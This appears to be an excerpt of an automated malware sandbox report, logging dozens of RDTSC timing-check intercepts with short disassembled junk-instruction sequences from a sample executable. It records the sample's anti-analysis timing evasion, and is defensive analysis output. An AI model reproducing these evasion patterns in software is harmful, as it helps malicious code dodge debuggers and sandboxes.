Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF2B second address: 3ECF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF32 second address: 3ECF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF4A second address: 3ECF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ED6FF second address: 3ED70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3F62C9 second address: 3F62DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F3A9502B5E6h 0x0000000c jnl 00007F3A9502B5E6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3F62DC second address: 3F6308 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD407Ch 0x00000008 push edx 0x00000009 jo 00007F3A94CD4076h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD407Eh 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3F5E7A second address: 3F5E86 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 402085 second address: 402089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 402089 second address: 4020A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5EAh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4020A4 second address: 4020A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C0F second address: 401C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C15 second address: 401C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C19 second address: 401C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C1D second address: 401C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C23 second address: 401C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3A9502B5F9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A9502B5EFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C55 second address: 401C5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401DC5 second address: 401DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401DCB second address: 401DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 40430F second address: 404323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 404323 second address: 404329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 408069 second address: 40806F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4081D4 second address: 4081D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4081D8 second address: 4081ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F3A9502B5E8h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 412DB7 second address: 412DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3A94CD407Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 412DC9 second address: 412DD2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 412C1D second address: 412C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 415100 second address: 415111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3A9502B5ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182A9 second address: 4182AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182AD second address: 4182B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182B1 second address: 4182B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182B7 second address: 4182C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182C2 second address: 4182C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182C7 second address: 4182DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A9502B5F2h 0x00000008 jp 00007F3A9502B5E6h 0x0000000e jne 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4182DF second address: 4182E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41A00F second address: 41A013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41A013 second address: 41A017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41A017 second address: 41A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41A022 second address: 41A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F3A94CD407Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41A046 second address: 41A079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A9502B5F5h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41A079 second address: 41A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41DF17 second address: 41DF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F3A9502B5E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41DF29 second address: 41DF37 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41F68C second address: 41F6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5F5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F3A9502B5E6h 0x00000016 jmp 00007F3A9502B5EDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 41F6BF second address: 41F6E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A94CD4086h 0x0000000c jbe 00007F3A94CD4076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 42507F second address: 42508B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3A9502B5E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 42508B second address: 42509D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jng 00007F3A94CD4076h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 423D14 second address: 423D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F3A9502B5E6h 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 423D2A second address: 423D49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3A94CD407Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F3A94CD4076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 423D49 second address: 423D53 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 423D53 second address: 423D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 423E90 second address: 423EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007F3A9502B5E6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 424DE6 second address: 424DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3A94CD4076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 429649 second address: 429650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 436C7C second address: 436C82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 436C82 second address: 436CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007F3A9502B5E6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F3A9502B5E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 436CA2 second address: 436CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 436CA6 second address: 436CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F3A9502B5E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 436CB7 second address: 436CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 436CD8 second address: 436CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 43D22C second address: 43D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 43D232 second address: 43D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F3A9502B5EAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 43D243 second address: 43D248 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 43D248 second address: 43D250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 441A41 second address: 441A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4089h 0x00000007 jmp 00007F3A94CD4080h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 441A71 second address: 441A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 441A7B second address: 441A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 44DA90 second address: 44DA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 44DA94 second address: 44DA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4680AF second address: 4680B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4680B4 second address: 4680BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4680BC second address: 4680E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jne 00007F3A9502B5ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F3A9502B5EEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 468273 second address: 468279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 468279 second address: 468283 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 468ED8 second address: 468F00 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD407Eh 0x00000008 jmp 00007F3A94CD407Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F3A94CD407Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 46BAB0 second address: 46BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 46BBA4 second address: 46BBAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 46BD60 second address: 46BD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 46C119 second address: 46C123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 46C123 second address: 46C127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 470B0E second address: 470B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 470B16 second address: 470B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3A9502B5E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 470B29 second address: 470B36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B80051 second address: 4B8007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B8007E second address: 4B800B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A94CD4081h 0x00000008 call 00007F3A94CD4080h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B800B5 second address: 4B800BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B800BB second address: 4B800E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, 27BAh 0x0000000f mov esi, edx 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD4088h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC00DB second address: 4BC00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC00E1 second address: 4BC0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3A94CD4087h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B500F5 second address: 4B500F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B500F9 second address: 4B500FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B500FF second address: 4B50170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov edx, 54565454h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov al, D9h 0x00000018 movsx ebx, si 0x0000001b popad 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F3A9502B5F6h 0x00000026 sub ecx, 1D121A68h 0x0000002c jmp 00007F3A9502B5EBh 0x00000031 popfd 0x00000032 mov di, ax 0x00000035 popad 0x00000036 push dword ptr [ebp+0Ch] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3A9502B5F1h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70DB8 second address: 4B70DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B706F5 second address: 4B706FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B706FB second address: 4B7070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Bh 0x00000009 rdtsc
